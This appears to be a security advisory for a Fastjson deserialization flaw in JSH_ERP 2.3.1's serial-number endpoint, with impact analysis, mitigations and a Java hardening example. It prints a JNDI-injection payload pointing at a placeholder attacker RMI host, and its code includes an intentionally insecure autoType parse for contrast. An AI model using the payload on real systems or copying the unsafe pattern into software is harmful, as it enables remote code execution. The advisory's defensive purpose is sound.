Overview
CVE-2025-51746 identifies a critical security vulnerability in jishenghua JSH_ERP version 2.3.1. The vulnerability resides in the /serialNumber/addSerialNumber endpoint and is susceptible to Fastjson deserialization attacks. This allows attackers to potentially execute arbitrary code on the server, leading to complete system compromise.
Technical Details
The vulnerability stems from the insecure deserialization of user-supplied data using Fastjson. When processing requests to the /serialNumber/addSerialNumber endpoint, the application fails to properly sanitize or validate the incoming serialized data. An attacker can craft a malicious JSON payload containing instructions to execute arbitrary code during the deserialization process. This can be achieved by injecting specific Java classes or utilizing known Fastjson gadgets.
Example of a potential malicious payload (illustrative, adapt to specific environment):
{
"{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://attacker.example.com/Exploit\",\"autoCommit\":true}": "evilcode"
}
This payload attempts to leverage JNDI injection through an RMI service hosted on attacker.example.com to execute malicious code. Note that the specific payload will depend on the Java version and available libraries on the target system. The provided example is simplified and is for illustrative purposes only.
CVSS Analysis
Currently, the CVSS score and severity rating are unavailable. However, given the potential for arbitrary code execution, this vulnerability is likely to be classified as Critical. The impact on confidentiality, integrity, and availability would be high, as a successful exploit could allow an attacker to gain complete control over the system.
Possible Impact
A successful exploitation of this Fastjson deserialization vulnerability could lead to a range of severe consequences, including:
- Remote Code Execution (RCE): Attackers can execute arbitrary code on the server, potentially gaining full control of the system.
- Data Breach: Sensitive data stored within the ERP system could be compromised, including customer information, financial records, and intellectual property.
- System Downtime: The application or entire server could be taken offline due to malicious activity.
- Supply Chain Attacks: Compromised ERP systems can be used as a stepping stone to attack connected systems or organizations, leading to cascading failures and widespread disruption.
- Financial Loss: Costs associated with incident response, data recovery, legal liabilities, and reputational damage.
Mitigation or Patch Steps
To mitigate this vulnerability, the following steps are recommended:
- Upgrade JSH_ERP: Check the official JSH_ERP repository on Gitee for patched versions or updates that address this vulnerability. Apply the update as soon as it becomes available.
- Input Validation: Implement strict input validation and sanitization on the /serialNumber/addSerialNumber endpoint to prevent the injection of malicious serialized data.
- Disable AutoType Feature in Fastjson (if applicable): If possible, disable the autoType feature in Fastjson to prevent arbitrary class instantiation during deserialization. This is often a global configuration setting.
- Use a Safe List (if possible): If disabling autoType is not possible, configure Fastjson to only allow deserialization of specific, trusted classes. This significantly reduces the attack surface.
- Web Application Firewall (WAF): Deploy a WAF to detect and block malicious payloads targeting the vulnerable endpoint. Configure rules specifically to prevent Fastjson deserialization attacks.
- Regular Security Audits: Conduct regular security audits and penetration testing to identify and address vulnerabilities proactively.
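The following Java example is added here to illustrate the insecure parse pattern described under Technical Details next to the hardened configuration recommended in the autoType and safe-list steps above. It is not code from JSH_ERP or from the Fastjson project. It assumes Fastjson 1.2.68 or later on the classpath (the version JSH_ERP 2.3.1 ships is not stated on this page, and setSafeMode does not exist before 1.2.68); the class SerialNumberRequest, its fields, and the package prefix com.example.erp are hypothetical stand-ins for whatever the real handler binds.

```java
// Added example, not JSH_ERP or Fastjson project code.
// Assumes Fastjson >= 1.2.68; SerialNumberRequest and com.example.erp are hypothetical.
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONException;
import com.alibaba.fastjson.parser.ParserConfig;

public class FastjsonHardening {

    // Hypothetical request shape for /serialNumber/addSerialNumber; only these
    // fields are ever bound, so a body cannot choose its own target class.
    public static class SerialNumberRequest {
        private String serialNumber;
        private Long materialId;
        public String getSerialNumber() { return serialNumber; }
        public void setSerialNumber(String v) { serialNumber = v; }
        public Long getMaterialId() { return materialId; }
        public void setMaterialId(Long v) { materialId = v; }
    }

    // Insecure pattern: autoType enabled globally and an untyped parse. Any
    // "@type" key in the request body selects the class Fastjson instantiates,
    // which is the root cause described in the Technical Details section.
    static Object parseUnsafe(String body) {
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
        return JSON.parseObject(body);
    }

    // Hardened pattern, option 1 (preferred): safeMode makes Fastjson reject
    // every "@type" key regardless of class name. Call once at startup.
    static void hardenGlobalParser() {
        ParserConfig cfg = ParserConfig.getGlobalInstance();
        cfg.setSafeMode(true);          // refuse all autoType resolution
        cfg.setAutoTypeSupport(false);  // also the pre-1.2.68 switch
    }

    // Hardened pattern, option 2 (safe list): if safeMode cannot be used,
    // keep autoType off and accept only an explicit, application-owned
    // package prefix. The prefix here is a hypothetical placeholder.
    static void configureSafeList() {
        ParserConfig cfg = ParserConfig.getGlobalInstance();
        cfg.setAutoTypeSupport(false);
        cfg.addAccept("com.example.erp.dto.");
    }

    // Typed parse: the target class is fixed by the code, not by the body.
    static SerialNumberRequest parseSafe(String body) {
        return JSON.parseObject(body, SerialNumberRequest.class);
    }

    public static void main(String[] args) {
        hardenGlobalParser();

        // Constructed benign body matching the hypothetical request type.
        String benign = "{\"serialNumber\":\"SN-0001\",\"materialId\":42}";
        SerialNumberRequest ok = parseSafe(benign);
        System.out.println("bound: " + ok.getSerialNumber() + " / " + ok.getMaterialId());

        // Constructed body carrying an "@type" key. The class name is a
        // placeholder, not a gadget; under safeMode Fastjson throws before
        // it attempts to resolve any class at all.
        String typed = "{\"@type\":\"com.example.Placeholder\",\"serialNumber\":\"x\"}";
        try {
            parseSafe(typed);
            System.out.println("unexpected: @type key was accepted");
        } catch (JSONException e) {
            System.out.println("rejected as expected: " + e.getMessage());
        }
    }
}
```

Two notes on the design. First, safeMode and the safe list are independent of the typed parse: a typed parse alone still consults the "@type" key in older Fastjson releases, so the global configuration is the control that actually closes the hole, and the typed parse is defence in depth. Second, Fastjson 1.2.68+ also reads the JVM system property fastjson.parser.safeMode, so an operator who cannot change JSH_ERP source can still enable safeMode by starting the application with -Dfastjson.parser.safeMode=true; verifying that the Fastjson jar on the deployed classpath is at least 1.2.68 is the first check to make, since earlier versions silently ignore that property.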
